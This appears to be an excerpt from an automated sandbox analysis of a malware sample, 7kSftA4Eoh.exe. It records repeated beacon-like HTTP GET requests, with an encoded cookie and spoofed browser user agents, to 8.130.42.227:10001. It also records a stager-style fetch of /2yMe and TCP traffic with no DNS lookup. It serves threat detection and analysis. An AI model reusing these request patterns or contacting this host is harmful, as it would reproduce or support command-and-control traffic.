            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: unknownTCP traffic detected without corresponding DNS query: 8.130.42.227
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_0099E3A0 _snprintf,_snprintf,_snprintf,HttpOpenRequestA,HttpSendRequestA,InternetQueryDataAvailable,InternetCloseHandle,InternetReadFile,InternetCloseHandle,0_2_0099E3A0
            Source: global trafficHTTP traffic detected: GET /2yMe HTTP/1.1User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; NP06)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
